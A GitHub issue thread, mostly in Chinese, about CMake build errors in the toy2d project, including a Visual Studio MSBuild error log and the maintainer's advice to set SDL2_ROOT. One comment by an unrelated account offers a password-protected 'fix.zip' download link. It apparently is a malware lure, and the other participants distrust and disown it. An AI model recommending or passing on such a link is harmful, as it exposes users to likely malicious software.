### ISSUE TITLE
提供的cmake文件不对，无法编译

### ISSUE THREAD

**Issue by Mag357num** [VisualGMQ/toy2d#3]
直接用cmake编会找不到SDL头文件，我改好之后又报别的cmake错误

**Comment by Mag357num** [comment]
作者大大麻烦看看

**Comment by Mag357num** [comment]
Severity	Code	Description	Project	File	Line	Suppression State	Details
Error	MSB3073	The command "setlocal
D:\cmake\bin\cmake.exe -E copy /lib/SDL2.dll E:/Projects/toy2d_vulkan/toy2d/build/sandbox/Debug
if %errorlevel% neq 0 goto :cmEnd
:cmEnd
endlocal & call :cmErrorLevel %errorlevel% & goto :cmDone
:cmErrorLevel
exit /b %1
:cmDone
if %errorlevel% neq 0 goto :VCEnd
setlocal
D:\cmake\bin\cmake.exe -E copy E:/Projects/toy2d_vulkan/toy2d/vert.spv E:/Projects/toy2d_vulkan/toy2d/build/sandbox/Debug
if %errorlevel% neq 0 goto :cmEnd
:cmEnd
endlocal & call :cmErrorLevel %errorlevel% & goto :cmDone
:cmErrorLevel
exit /b %1
:cmDone
if %errorlevel% neq 0 goto :VCEnd
setlocal
D:\cmake\bin\cmake.exe -E copy E:/Projects/toy2d_vulkan/toy2d/frag.spv E:/Projects/toy2d_vulkan/toy2d/build/sandbox/Debug
if %errorlevel% neq 0 goto :cmEnd
:cmEnd
endlocal & call :cmErrorLevel %errorlevel% & goto :cmDone
:cmErrorLevel
exit /b %1
:cmDone
if %errorlevel% neq 0 goto :VCEnd
setlocal
D:\cmake\bin\cmake.exe -E copy_directory E:/Projects/toy2d_vulkan/toy2d/resources E:/Projects/toy2d_vulkan/toy2d/build/sandbox/Debug/resources
if %errorlevel% neq 0 goto :cmEnd
:cmEnd
endlocal & call :cmErrorLevel %errorlevel% & goto :cmDone
:cmErrorLevel
exit /b %1
:cmDone
if %errorlevel% neq 0 goto :VCEnd
:VCEnd" exited with code 1.	sandbox	C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v170\Microsoft.CppCommon.targets	166

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mag357num** [comment]
改了一下好了

**Comment by Mag357num** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

这是什么？不敢下

**Comment by VisualGMQ** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> 这是什么？不敢下

我不知道这个是什么东西。我的程序里面没有这种东西。
找不到SDL是因为你SDL路径没指定或者指定错了。要不就是你SDL库下错了。打开cmake-gui设置SDL2_ROOT到你的SDL目录
